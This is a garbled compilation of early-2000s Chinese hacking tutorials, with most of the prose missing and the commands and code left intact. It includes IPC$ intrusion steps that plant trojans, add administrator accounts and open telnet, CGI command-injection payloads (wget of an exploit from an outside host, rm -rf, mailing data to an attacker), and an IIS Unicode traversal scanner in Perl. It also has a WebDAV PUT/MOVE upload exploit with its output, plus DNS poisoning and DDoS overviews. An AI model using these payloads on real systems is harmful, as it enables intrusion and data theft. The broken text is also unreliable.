at \\***.***.***.*** 09:00 srv.exe
ID = 0
telnet ***.***.***.*** 99
c:\winnt:\system32>
copy c:\hack\ntlm.exe \\211.21.193.202\admin$

hack ntlm.exe telnet
ntlm.exe
C:\WINNT\system32>ntlm
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.

Done!
C:\WINNT\system32>
C:\WINNT\system32>
WIN2000 telnet srv.exe telnet
net stop telnet telnet
net start telnet telnet

telnet
23 guest
net.exe winnt\system32\logfiles
14

http://www.91one.net/dvbbs/dispbbs.asp?boardID=14&ID=403
Port Mapping
Internet
Internet FTP
IP IP
IP
Internet IP IP
Internet
PM
http://www.pconline.com.cn/pcedu/soft/lan/jywgl/10301/127157.html
Remote Administrator
http://www.pcworld.com.cn/2002/back_issues/2205/0533e.asp
http://www.skycn.com/soft/15592.html
20cn
scanipc
http://down.yqdown.com/xdown/yqdown0316/scanipc.rar
IP
opentelnet TELNET
http://www.infosw.com/down/software.asp?id=1520
telnet
, 23 !
Opentelnet :
OpenTelnet.exe \\server <> <>
:
C:\>OpenTelnet.exe \\192.168.1.2 administrator 123456 1 90
administrator 123456
NTLM
:1( 0 )
90
Disconnecting server...Successfully!
90
Telnet
Telnet 192.168.1.2 90
WinShell(
http://www.hktk.com/soft/soft_server/winshell.html) winshell
FTP
:
c:\>ftp
ftp>openwww.cnwill.com
mput c:\cnwill.exe
Telnet 192.168.1.2 90
( )
net
net user \\192.168.1.2 90\ipc$ "" /user:"administrator"

[ IPC$ ]
copy d:\zilong.exe \\192.168.1.2 90\admin$\system32
[ ]
copy d:\long.exe \\192.168.1.2 90\admin$\system32
[ ]
copy d:\scoks.exe \\192.168.1.2 90\admin$\system32
[ SCOKS ]
copy d:\zilong.reg \\192.168.1.2 90\admin$\system32
[ REG ]
net time \\192.168.1.2 90
[ ]
at \\192.168.1.2 90 13:20 zilong.exe
[a t ]
==============
, IPC ,.
=============
telnet 192.168.1.2 90
[ ]
net user **** /add
[ guest]
net localgroup administrators **** /add
[ , ]
regedit /s c:\winnt\system32\zilong.reg
[ ]
,,
.
SOCKS -install
[ socks ]
SCOKS -config starttype 2

[ SOCKS ]
socks -config port 1080
[ socks 1080 ]
net start skserver
[ SOCKS ] QQ IP
long
[ , ]
15
telnet
telnet,,,
*, telnet ,
telnet, telnet?Telnet /
Telnet
?
, : Telnet
Telnet
Telnet
Ip
Telnet 4
1 TCP
Ip
2
NVTNet Virtual Terminal
IP
3 NVT
4 TCP
Telnet ? Telnet TCP/IP
Internet
Telnet
1Telnet
2Telnet
3Telnet Telnet
,,,
Win2000 Telnet , 2000

Win2000 Telnet Telnet.exe
Clienttlntsvr.exe server Telnet
tlntadmn.exe Win2000 Telnet

HELP
.Windows 2000
Telnet HELP
Telnet
AllowTrustedDomain 1
0:
DefaultDomain
"."
DefaultShell shell %systemroot
%\System32\Cmd.exe /q /k
MaxFailedLogins
3
LoginScriptTelnet
%systemroot%\System32\login.cmd
Telnet
NTLMNTLM 2
0: NTLM
1: NTLM
2: NTLM
TelnetPorttelnet
telnet 23
tlntadmn.exeTelnet
Telnet 1
2 NTLM
telnet NTLM
NTLM win2000
telnet
NTLM NTLM
NTLM
SMB "LAN Manager
Challenge/Response"LM
WindowsNT / NTLM
NTLMv2 Kerberos
NTLM
1
2
3 16
challenge
4 challenge
response
5 challenge
response
6 SAM
challenge
7
challenge
NTLM
Telnet
A B
A xinxin 1234 B
Administrator 5678 Telnet B NTLM
7 xinxin 1234
Administrator 5678
Telnet NTLM
3 Telnet
1)
=0
=====================================
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
Welcome to Microsoft Telnet Service
Telnet Server Build 5.00.99201.1
login:
password:
\\ 0 NTML
Administrator 5678
2)
=1
=====================================
NTLM Authentication failed due to insufficient credentials.Please
login withclear text username and password
Microsoft (R) Windows (TM) Version 5.00 (Build 2195)
login:
password:
\\ NTLM
3)
=2
=====================================
NTLM Authentication failed due to insufficient credentials.Please
login withclear text username and password

Server allows NTLM authentication only
Server has closed connection
C:\>
\\
NTLM
1 telnet 2 1
0
2 NTLM.exe telnet
1
3 telnet
4 opentelnet.exe
IPC
5 RTCS
IPC
5
telnet
OpenTelnet.exe
\\server
username
password
NTLMAuthor
telnetport
OpenTelnet.exe \\
0 1 telnet
cscript RTCS.vbe targetIP username password NTLMAuthor

telnetport
cscript RTCS.vbe < IP> <
> <> <
>
telnet ? ,
1
,,
1
type
c:\boot.ini pro server
2 tftp
telnet ipc
net share ipc$
copy
shell(
)TFPT TFTP
TFTP(Trivial File Transfer Protocol)
UDP Windows tftp.exe TFTP
TFTP Server
tftpd32.exe telnet
shell
C:\>tftp i ip get xinxin.exe c:\abc\xinxin.exe
ip ip TFTP
xinxin.exe c abc
tftp
IP
IP
MAC
TFTP
3
, .

asp

telnettelnet shell
( copy ,)
1
cmd telnet

3389

'hacking'
ipc$
5

()
,,,
16

2

SID ,
SAM\Domains\Account \Users F
admin F F

SAM


ca.exe
http://www.hejie.net/xz/list.asp?id=926
SYSTEM
psu.exe
www.sometips.com/soft/psu.exe
17
PING
ping
C:\>ping 10.1.1.2
Pinging 10.1.1.2 with 32 bytes of data:
Reply from 10.1.1.2: bytes=32 time<10ms TTL=128
Ping statistics for 10.1.1.2:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\>
C:\>ping 10.1.1.6
Pinging 10.1.1.6 with 32 bytes of data:
Request timed out.
Reply from 10.1.1.6: bytes=32 time=250ms TTL=237
Ping statistics for 10.1.1.6:
Packets: Sent = 4, Received = 3, Lost = 1 (25% loss),
Approximate round trip times in milli-seconds:
Minimum = 234ms, Maximum = 250ms, Average = 179ms
ICMP TTL TTL=125

windows TTL=235 UINX
10.1.1.2 win2000 10.1.1.6
UINX Sunos 5.8 ICMP
TTL 1 TTL
TTL
1 80
telnet 80
C:\>telnet 10.1.1.2 80
get
HTTP/1.1 400 Bad Request

Server: Microsoft-IIS/5.0
Date: Fri, 11 Jul 2003 02:31:55 GMT
Content-Type: text/html
Content-Length: 87
The parameter is incorrect.
C:\>
windows
Method Not Implemented

get to / not
supported.
Invalid method in request get
Apache/1.3.27 Server at gosiuniversity.com Port 80
C:\>
UINX
2 21
FTP
C:\>ftp 10.1.1.2
Connected to 10.1.1.2.
220 sgyyq-c43s950 Microsoft FTP Service (Version 5.0).
User (10.1.1.2:(none)):
win2000
sgyyq-c43s950
FTP windows IIS FTP
220 Serv-U FTP Server v4.0 for WinSock ready...
User (10.1.1.3:(none)):
windows Serv-U FTP windows
FTP
220 ready, dude (vsFTPd 1.1.0: beat me, break me)
User (10.1.1.3:(none)):
UINX
3 23 telnet
Microsoft ? Windows ? Version 5.00 (Build 2195)

login:
windows
SunOS 5.8
login:
UINX SunOS 5.8
TCP/IP
TCP/IP TCP/IP
nmap,
http://www.linuxeden.com/download/indexsoft.php?
category=syssecure
supersan
http://www.xfocus.net/tools/200206/ 1.0.5.zip
18
FTP SQL

FTP FTP
FTP
FTP FTP

FTP
FTP
FTP
UNIX
FTP
^^^)
FTP

FTP
FTP ftp -v -d -i -n -g [
]
-v
-n
ftp .n etrc
-d
-g
FTP ():
1.![cmd[args> shell exit ftp !
ls*.zip
2.$ macro-ame[args] macro-name
3.account[password]
4.append local-file[remote-file]
5.ascii
ascii
6.bell
7.bin
8.bye ftp
9.case
mget
10.cd remote-dir
11.cdup
12.chmod mode file-name
file-name
mode chmod 777 a.out
13.close ftp ( open )
14.cr
asscii
15.delete remote-file
16.debug[debug-value]
deb up 3 0 debug
17.dir[remote-dir][local-file]
18.disconnectionclose
19.form format format file
20.get remote-file[local-file]
remote-file
local-file
21.glob mdeletemgetmput
-g
22.hash
1024 hash (#)
23.help[cmd]ftp cmd help get
24.idle[seconds][seconds]
25.image(binary)
26.lcd[dir] dir
27.ls[remote-dir][local-file] remote-dir
local-file
28.macdef macro-name macdef
29.mdelete[remote-file]
30.mdir remote-files local-filedir
mdir *.o.*.zipoutfile
31.mget remote-files
32.mkdir dir-name
33.mls remote-file local-filenlist

34.mode[modename] modename
stream
35.modtime file-name
36.mput local-file
37.newer file-name file-name
38.nlist[remote-dir][local-file]
local-file
39.nmap[inpattern outpattern]
nmap $1.$2.$3[$1$2].[$2$3]
a1.a2.a3 a1a2 UNIX

40.ntrans[inchars[outchars>
ntrans1R LLL RRR
41.open host[port]ftp
42.passive
43.prompt
44.proxy ftp-cmd
ftp ftp
ftp
open
45.put local-file[remote-file] local-file
46.pwd
47.quitbye ftp
48.quote arg1arg2...
ftp
quote syst.
49.recv remote-file[local-file]get
50.reget remote-file[local-file]
get local-file
51.rhelp[cmd-name]
52.rstatus[file-name]

53.rename[from][to]
54.reset
55.restart marker marker get put restart
130
56.rmdir dir-name
57.runique.
1.2
58.send local-file[remote-file]put
59.sendport PORT
60.site arg1arg2...
SITE ftp
61.size file-namesite idle 7200

62.status ftp
63.struct[struct-name] struct-name
stream
64.sunique( runique )
65.system
66.tenex TENEX
67.tick
68.trace
69.type[type-name] type-name ascii
:type binary
70.umask[newmask]
umask newmask umask

3
71.user user-name[password][account]
user anonymous my@email
72.verbose
-v ftp
on.
73.?[cmd]help.
FTP
FTP ,!!
FTP .
anonymous ftp
Anonymous FTP
@ FTP
/etc/passwd /etc/group
FTP FTP
E-mail passwd
@ E-mail
FTP
chroot
FTP FTP
FTPFTP
FTP
chroot

FTP inetd
FTP chroot
chrootuid
FTP
chroot
FTP
FTP
/etc/passwd
telnet ftp21 SITE
CHMOD SITE EXEC/home FTP
****

FTP scanner
http://sorry.vse.cz/~xmicm08/FTPScanner/
FTP Scanner
:Host
,Beginning , IP
IP.Ending IP
. IP.
Threads
. Moden 50--70 .
100
. Session Begin FTP scan .
View options
Login config
UserName Password
Oracle
Oracle UserName Password
IP Logging
iplog.txt

ftp> get /etc/passwd
shell OK
anonymous
IP
19
80
80 ,,.
( host
)
1'.' '..' '...'
web web
web
CGI '..'
Example:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
mosd web
2'%20'
%20 16
web
Example:
http://host/cgi-bin/lame.cgi?page=ls%20-al|
unix
3'%00'
%00 16 web
Examples:
http://host/cgi-bin/lame.cgi?page=index.html
cgi
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
cgi
html.shtml
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd%00html
cgi
4'|'
unix
Example:
# cat access_log| grep -i '..'
..
web IDS

http://host/cgi-bin/lame.cgi?page=../../../../bin/ls|
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls%20-al%20/etc|
unix /etc
http://host/cgi-bin/lame.cgi?page=cat%20access_log|grep%20-i
%20'lame'
cat
grep
lame'
(5)';'
unix
Example:
# id;uname -a
id
uname
web IDS
web IDS
(6'<' '>'
Example 1:
# echo 'your hax0red h0 h0' >> /etc/motd motd
)
web
RDS exploit web
Example 2:
http://host/something.php=Hi%20mom%20Im%20Bold!
html

web

16
7'!'
SS(Server Side Include) I
Example:
http://host1/something.php=
host2
host1
16
web
Example:
http://host/something.php=
id' web
id
nobody'www'
Example:
http://host/something.php=
.htpasswd ,Apache
.ht SSI
8 ' web PHP
php
Example: http://host/something.php=
php web
9'`'
perl web
Example:
http://host/something.cgi=ìd`
perl
cgi id
,,
,.,
'/bin/ls'
web
web
cgi,asp,php...etc)
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls%20-al|
http://host/cgi-bin/bad.cgi?doh=ls%20-al;
'cmd.exe'
windows shell,
windows
80
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe
?dir+e:
'/bin/id'
2
/bin/ls

Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id|
http://host/cgi-bin/bad.cgi?doh=id;
'/bin/rm'
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm%20-rf%20*|
http://host/cgi-bin/bad.cgi?doh=rm%20-rf%20*;
'wget and tftp'
wget unix
tftp unix nt
IIS tftp
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget
%20http://host2/Phantasmp.c| http://host/cgi-bin/bad.cgi?doh=wget
%20http://www.hwa-security.net/Phantasmp.c;
'cat'
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat
%20/etc/motd| http://host/cgi-bin/bad.cgi?doh=cat%20/etc/motd;
'echo'
index.html
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo
%20'fc-#kiwis%20was%20here'%20>>%200day.txt| http://host/cgibin/bad.cgi?doh=echo%20'fc-#kiwis%20was%20here'%20>>
%200day.txt;
'ps'
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps%20-
aux| http://host/cgi-bin/bad.cgi?doh=ps%20-aux;
'kill and killall'
unix
exploit
Examples: http://host/cgi-bin/bad.cgi?doh=../bin/kill%20-9%200|
http://host/cgi-bin/bad.cgi?doh=kill%20-9%200;
'uname'
web
isp
uname
-a

Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname
%20-a| http://host/cgi-bin/bad.cgi?doh=uname%20-a;
'cc, gcc, perl, python, etc...' /
wget tftp exploitcc,gcc
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc
%20Phantasmp.c|
http://host/cgi-bin/bad.cgi?doh=gcc
%20Phantasmp.c;./a.out%20-p%2031337;
perl python
perl ,python
'mail'
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail
%20attacker@****cnhonker.org%20<
20
sniffer
sniffers()
internet .
.
2
1 sniffer 2 sniffer
sniffer
, ,
. "" ,
,. sniffer
,
.
lan/wan
sniffers
.
sniffers,
, .
sniffers
sniffers Sniffer Pro
snoop UNIX

GOOGLE BAIDU www.yahoo.com
sniffer
, sniffer .
, sniffers.
(
),
.""
,
sniffer
.
"".
, .Sniffer
,
.
AntiSniff
()
http://www.pdasky.com.cn/down.asp?id=2876&no=1
21
?
.
mac
tcp/ip
ip .

*tcp/ip
OSI TCP/IP OSI 7
tcp/ip 5
()
HUB (
) HUB
HUB mac

promiscuous
promiscuous
,
1

,
2
dns
dns DNS
ping
, COPY , ,:
00:30:6E:00:9B:B9, ip
192.168.1.1, icmp
00:30:6E:00:9B:9B, 192.168.1.1

ip ip ping
arp
,arp icmp ,
arp
arp
( ARP? ARP , Address Resolution Protocol

, MAC
. IP MAC
ARP IP
MAC )
, www.google.com sniffer tools .
Windows
Windump http://www.xfocus.net/tools/200108/238.html
http://security.zz.ha.cn/windump.html
NT
98 98
ME NT
UNIX
Sniffithttp://www.programsalon.com/download.asp?
type_id=53?? 6
http://www.xfocus.net/articles/200001/28.html
22
IIS5 UNICODE
2
unicode
,,
,administrator !
10 ,
.
()unicode
,,
!
UNICODE BUG UNICODE
%c1%1c -(0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -(0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
NT4 /%c1%9c . :WIN2000 %c0%af
UNICODE "/""\""../",
unicode
ip
/scripts/..
%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
c .
()unicode
IUSR_machinename
Everyone Users Web
!
()unicode
1
!
, IE http://
ip/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\
c
., dir+c:\ set ,
PATH_TRANSLATED=c:\inetpub\wwwroot (
).
c:\inetpub\wwwroot !
,
CMD.EXE
c:\inetpub\scripts ,
,echo
:,,
?
( gale),
cmd.exe
c:\inetpub\scripts , gale.exe gale ( q:)
q:
.
,
,,
, ?
:
echo
ip/scripts/gale.exe?/c+echo+open+ ip>.txt
ip/gale.exe?/c+echo+>>.txt
ip/gale.exe?/c+echo+>>.txt
ip/gale.exe?/c+echo+get+index.htm>>.txt
ip/gale.exe?/c+echo+bye>>.txt
ip/gale.exe?/c+ftp+-s:.txt
copy
()unicode
, ,
unicode
perl

#!/usr/bin/perl
#Root Shell Hackers
#piffy
#this is a quick scanner i threw together while supposedly doing
homework in my room.
#it will go through a list of sites and check if it gives a directory
listing for the new IIS hole
#it checks for both %c0%af and %c1%9c (
)
#perhaps a public script to do some evil stuff with this exploit
later...h0h0h0
#werd: all of rsh, 0x7f, hackweiser, rain forest puppy for
researching the hole =]
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $def = new LWP::UserAgent;
my @host;
print "root shell hackers\n";
print "iis cmd hole scanner\n";
print "coded by piffy\n";
print "\nWhat file contains the hosts: ";
chop (my $hosts=);
open(IN, $hosts) || die "\nCould not open $hosts: $!";
while ()
{
$host[$a] = $_;
chomp $host[$a];
$a++;
$b++;
}
close(IN);
$a = 0;
print "ph34r, scan started";
while ($a < $b)
{
my
$url="http://$host[$a]/scripts/..
%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "\n$host[$a] : $response->content";
-close OUT;
} else {
print $response->error_as_HTML;
}
&second()
}
sub second() {
my
$url2="http://$host[$a]/scripts/..
%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ ";
my $request = new HTTP::Request('GET', $url2);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>scaniis.log");
print OUT "\n$host[$a] : $response->content";

-close OUT;
} else {
print $response->error_as_HTML;
}
$a++;
}
$url $url2
:
winnt
winnt win2000 c:\winnt.
"http://$host[$a]/scripts/..
%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\"
url ""
perl
, winnt/2000
?,
:
cmd.exe
cmd.exe *
winnt/win2000
,
web
C:\InetPub\wwwroot c:\inetpub
scripts
web
e:\netroot C:\inetpub
., unicode , web
d , d , QQ :"!
,
!~~",!, ,(:
,
, !).
internet ,
, web
,.

, web
80 108
unicode
, ip
, (:
,.
.)
3
iusr_server
UNICODE

iusr_server
iusr_server
guest
iusr_server
NTFS web
iusr_server
iusr_server web
4
.
,, unicode , web
,"cmd.exe"
,:
admin
unicode ,
,.,(:
:admin :1234),.,*
, . 8 ,
,:g&A$l#e7 ,,
,
,,.
,
,
,()
23
log
:)log IP IP
.QQ ICQ
.ftp
.mail
.telnet
.
.(
IRC
wingates proxies
windows sock
.
wingate
wingates
1080 socks
wingatescan
http://www.cyberarmy.com/lists/wingate
. wingate
.
purpose
http://www.buffy.nu/article.php3?id_article=3043
socks server : 127.0.0.1 port 8000.
'socks version 5'.'resolve all names remotely'.
'supported authentication'
new socks
.
socks chainer
http://www.ufasoft.com/socks
service , new name Chainport 8000
new
wingates IP
1080
'<' '>', socks.

socks.
.
http://cavency.virtualave.net/cgi-bin/env.cgi
http://internet.junkbuster.com/cgi-bin/show-http-headers
telnet
telnet
ftp.cztc.edu.cn
https://sites.inka.de:8001/cgi-bin/pyca/browser-check.py
SSL
FTP ftp.zedz.net FTP
IP
chain IP
SkSockServerSSS
wingate
1/ Sock SSS
255
2/ Sock SSS
..
webmaster
sock
webmaster sniffer
SSS
3/ sock SSS
ok
sock Tcp Udp
SSS
COPY
A SSS
SSS
SSS
-install NT SSS
-remove SSS.
-debug snake debug
sksockserver install
sksockserver
net start skserver skserver A
Ok A
B
B IE SSS~~2IP
B sockservercfg
vc sockservercfg, mfc
XXXX mfc42.dll
B X:\winnt\system32
sockservercfg 3 4 5
3SSS
SSS SnakeSo lazy!

4SSS client
5SSS IP A Ip
bActive
bActive Snake!!!
Too too lazy! Add.
ok SocksCap
http://www.youngzsoft.com/cn/sockscap/
SocksCap Sock IP A , SocksCap
telnet,ftp,ntshell,IE
:
C,D,E.....
n A 3389
SSS
24
2003
()

http://main.huigezi.com/main.asp

http://main.huigezi.com/main.asp
IP (
)
P_Client.exe (
)
Server.exe (
!)
(P_Client.exe)
!
!
1. !
IP !
!
!
!.126.com
!
E-Mail !(
!)
!!
!
!
!
!
Server.exe
()

!!
! !
!

2003
2003
XP
IPC
SUPERSCAN
IE
QQ
25
DNS
Internet DNS bind ,
bind
bind 4.9.5+P1 bind 8.2.2-P5 . bind ,

BIND (Cache)
, .(
BIND?BIND ISC Internet
)
1>.DNS
DNS , DNS
,,DNS
:
unix Internet
, rlogin , IP 123.45.67.89,
DNS (/etc/resolv.conf
DNS ) IP 98.76.54.32,(IP
38.222.74.2) unix
rlogin
, unix
/etc/hosts.equiv
dns , unix
IP 98.76.54.32 DNS
PTR :
123.45.67.89 -> 98.76.54.32 [Query]
NQY: 1 NAN: 0 NNS: 0 NAD: 0
QY: 2.74.222.38.in-addr.arpa PTR
IP 98.76.54.32 DNS ,,
DNS 38.222.74.2 38.222.74.10 74.222.38.in-addr.arpa. DNS
, 38.222.74.2 PTR :
98.76.54.32 -> 38.222.74.2 [Query]
,38.222.74.2 IP, .
DNS ,:
38.222.74.2 -> 98.76.54.32 [Answer]
AN: 2.74.222.38.in-addr.arpa PTR trusted.host.com
AN: trusted.host.com A 38.222.74.2
NS: 74.222.38.in-addr.arpa NS ns.sventech.com
NS: 74.222.38.in-addr.arpa NS ns1.sventech.com
AD: ns.sventech.com A 38.222.74.2
AD: ns1.sventech.com A 38.222.74.10
98.76.54.32 DNS ,
123.45.67.98, rlogin unix
( :) ), 98.76.54.32
DNS .
unix
IP 38.222.74.2
trusted.host.com, unix
/etc/hosts.equiv , rlogin ,,
.
unix ,,PTR ,PTR
A , IP :
123.45.67.89 -> 98.76.54.32 [Query]
QY: trusted.host.com A
, 98.76.54.32 DNS ,
2.74.222.38.in-addr.arpa
98.76.54.32 -> 123.45.67.89 [Query]

QY: trusted.host.com A
AN: trusted.host.com A 38.222.74.2
unix
38.222.74.2 trusted.host.com ,
IP : Internet DNS , ,
DNS ,
.
2>. Denial of service
, 38.222.74.2 ,
98.76.54.32 DNS 2.74.222.38.in-addr.arpa ,:
74.222.38.in-addr.arpa ,
.
38.222.74.2 -> 98.76.54.32 [Answer]
AN:www.company.com A 0.0.0.1
,98.76.54.32 DNS
www.company.com ,
IP !
3>. Theft of services
,:
38.222.74.2 -> 98.76.54.32 [Answer]

AN:www.company.com CNAMEwww.competitor.com
AN: company.com MX 0 mail.competitor.com
,http://www.competitor.com
, ( .:) ).
company.com mail.compertitor.com.(
! xxbin ).
4>.
,.
, ., 98.76.54.32
DNS www.company.com CNAME ,
www.competitor.com .,, A , DNS
www.company.com A 1.2.3.4, DNS www.company.com A

4.3.2.1, www.company.com A ,
.(,
loading balance ?)
,DNS
, www.netbuddy.org TTL 7200, DNS

www.netbuddy.org 7200 .
TLL 604800 A , ,
,
DNS
"".
:
A can add
NS can add
MX can add
PTR cannot add
CNAME cannot add

,
ping ping of death
TCP/IP ICMP 64KB

ICMP 64K
TCP/IP
TCP/IP

windows98
windows,NT(service
pack 3 )linuxSolaris Mac OS
ping of
death ICMP
teardrop
TCP/IP IP
IP
TCP/IPservice
pack 4 NT

UDP UDP flood

TCP/IP Chargen Echo
Chargen
UDP
Echo
TCP/IP
Internet UDP
SYN SYN flood
DDOS
TCP/IP ACK
SYN
SYN
Land
Land SYN
SYN-ACK
ACK
Land UNIX
NT
10 127 192.168 172.16 172.31

Smurf
smurf
ICMP ping
ICMP
ping
of death Smurf
ICMP
Fraggle
Fraggle Smurf UDP
ICMP
UDP
NetBIOSTelnet NFS
NFSNetBIOS Telnet
NetBus BackOrifice BO2k,
netcatVNCpcAnywhere

TCP
strcpy(),strcat()

SafeLibtripwire
ping
ICMP
TCP
host
unreachable

RESET SYN-ACK DNS
NAT
host unreachableICMP

10
NT Solaris TCP/IP
Banner
DNS
DNS
DNS
IP
Finger
finger finger
finger IP
LDAP
LDAP
LDAP
LDAP LDAP DMZ
4
DNS
DNS
DNS
DNS DNS
SMTP

PGP
:http://www.91one.net/dvbbs/dispbbs.asp?boardid=17&id=699
26
DDOS
DDOS

http://www.91one.net/dvbbs/dispbbs.asp?boardID=16&ID=698
1------ ping ping of death teardrop UDP
UDP flood
SYN SYN flood--
DDOS
Land Smurf Fraggle
2
3
4

DDOS
DDOS
DDOS
DDoS DoSDoS Denial of

Service
DoS
Internet
DoS
DoS
DoS 1
1 DoS

DDoS DoS
DoS
CPU
DoS
-
""
3,000 10,000
DDoS DoS
10
10
100
DDoS
DDoS
G 2.5G
DDoS
TCP
, DDoS 2 3
4
DDoS
3 2
2 3
DDoS
"
" DDoS
,
1.
2.
DDoS
"
" DDoS
DDoS
1.
DDoS
http://www.WWWW.com

www yahoo http://www.WWW.com
66.218.71.87
66.218.71.88
66.218.71.89
66.218.71.80
66.218.71.81
66.218.71.83
66.218.71.84
66.218.71.86
DDoS 66.218.71.87
www
http://www.WWW.com IP
IP
IP
DDoS
DDoS
2 5
DDoS
*
2.
DDoS
DDoS DDoS

cgiUnicodeftp
()
DDoS
ftp DDoS
3.
2
"
~ ~!"
DDoS
""

ping
SYN Flood
SYN-Flood DDoS
DoS
SYN-Flood
SYN-Flood
Syn Flood -
Syn Flood
TCP/IP
TCP Syn Flood

TCP
TCP SYN
TCP
ISNTCP ISN (SYN )
TCP (ACK )
ISN(ACK )
TCP
Syn Flood
SYN
SYN+ACK ACK
SYN+ACK
SYN
Timeout 30 -2
1
----
CPU
IP SYN+ACK
TCP/IP
---
TCP

SYN Flood SYN
1Trinoo
Trinoo 4 UDP

IP
27665/TCP
27444/UDP
31335/UDP
2TFN
TFN
SYN Ping UDP SMURF
3TFN2K
TFN2K TFN TFN TFN2K

TFN ICMP Mix Targa3
TFN2K
4Stacheldraht
Stacheldraht TFN
TFN
RFC2267
Stacheldrah
DDoS
DDoS
1

ICP UDP
2DDoS
DDoS
DDoS
TCP/IP TCP/IP DDoS

DDoS 1,000

DDoS
DDoS
ISPICP
WWW
DDoS
DoS
Syn
Syn time out
DDoS
SYN
IP
DDoS
.
Cisco
Cisco Express ForwardingCEF

unicast reverse-path
ACL
SYN
ISO
log server
CEF Unicast
IOS
Cisco startup config running
config running config
startup config
copy start run
ISP / ICP
ISP / ICP
DDoS
""

- DDoS ISP
ISP
ISP
ISP
27
iis
IIS iis
iis IIS iis
web telnet
web
(80)
PUT /dir/my_file.txt HTTP/1.1

Host: iis-server
Content-Length: 10
100( )
HTTP/1.1 100 Continue
Date: Thu, 28 Feb 2002 15:56:00 GMT
10
AAAAAAAAAA
201 Created
HTTP/1.1 201 Created
Date: Thu, 28 Feb 2002 15:56:08 GMT
Location: http://iis-server/dir/my_file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE,
PROPFIND,
PROPPATCH, SEARCH, LOCK, UNLOCK
403
401(
web
%^#$!~
PUT /dir/my_file.txt HTTP/1.1

Host: iis-server
Content-Length: 10
PUT URL URL
URL URL
URL
Host
HTTP
Content-Length
nctelnet perl
binmode()
#!/usr/bin/perl
use I:Socket;
$ARGC = @ARGV;
if ($ARGC != 4)
{
print "usage:$0 127.0.0.1 80 kaka.exe /Scripts/file.exe\n";
exit;
}
$host = @ARGV[0];
$port = @ARGV[1];
$file = @ARGV[2];
$path = @ARGV[3];
@s=stat("$file");
$size = $s[7]; #
print "$file size is $size bytes\n";
my $sock = I:Socket::INET->new(Proto =>"tcp",

PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host \n";
print $sock "PUT $path HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Content-Length: $size\n\n"; #sock
open(FILE,"$file");
binmode(FILE); #2
while (read(FILE,$char,1024)) { #
print $sock "$char";
}
print $sock "\n\n";
@req = <$sock>;
print "please wait...\n";
sleep(2);
if ($req[4]=~/200|201/){
print "upfile Succeed!!!" ; #
}
else{
print "upfile faile!!!\n\n";
print @req;#
}
close $sock;
close FILE;
C:\usr\bin>perl.exe
iiswt.pl
/Scripts/kaka.txt
kaka.txt size is 14 bytes
please wait...
upfile Succeed!!!
127.0.0.1
80
kaka.txt
C:\Inetpub\Scripts>dir kaka.txt
C
3CD1-479E
C:\Inetpub\Scripts
2004-05-05 00:37 14 kaka.txt
1 14
0 3,871,080,448
kaka.txt web Scripts
binmode()
2 exe
C:\usr\bin>perl.exe
iiswt.pl
127.0.0.1
80
perl.exe
/Scripts/perl.exe
perl.exe size is 20535 bytes
please wait...
upfile Succeed!!!
C:\Inetpub\Scripts>dir perl.exe
C
3CD1-479E
C:\Inetpub\Scripts
2004-05-05 00:42 20,535 perl.exe
1 20,535
0 3,871,031,296
exe asp
C:\usr\bin>perl.exe
iiswt.pl
127.0.0.1
/Scripts/kaka.asp
kaka.asp size is 4 bytes
please wait...
upfile faile!!!
HTTP/1.1 100 Continue
Date: Tue, 04 May 2004 16:45:51 GMT
80
kaka.asp
HTTP/1.1 403 Forbidden

Date: Tue, 04 May 2004 16:45:51 GMT
Connection: close
Content-Type: text/html
Content-Length: 44
post
asp
iis
iis iis
putpostget
COPY, MOVE
asp web txt
copymove asp
nc
D:\>nc 127.0.0.1 80
MOVE /scripts/kaka.txt HTTP/1.1
Host:127.0.0.1
Destination: http://127.0.0.1/scripts/kaka.asp
HTTP/1.1 201 Created
Date: Sun, 05 Oct 2003 09:30:59 GMT
Location: http://127.0.0.1/scripts/x.asp
Content-Type: text/xml
Content-Length: 0
MOVE /scripts/kaka.txt /scripts/kaka.asp
put move iis :)perl
asp
C:\usr\bin>perl kaka.pl 127.0.0.1 80 kaka.asp /scripts/kaka.asp
************************************************************
codz by SuperHei && lanker
************************************************************
kaka.asp size is 4 bytes

please wait...
upfile Succeed!!!
Modifyfile Succeed!!!
iiswrite.pl
lanker THX lanker

#!/usr/bin/perl
#The iiswrite Script
use I:Socket;
$ARGC = @ARGV;
print "*" x 60;
print "\ncodz by SuperHei && lanker\n";
print "*" x 60,"\n";
if ($ARGC != 4)
{
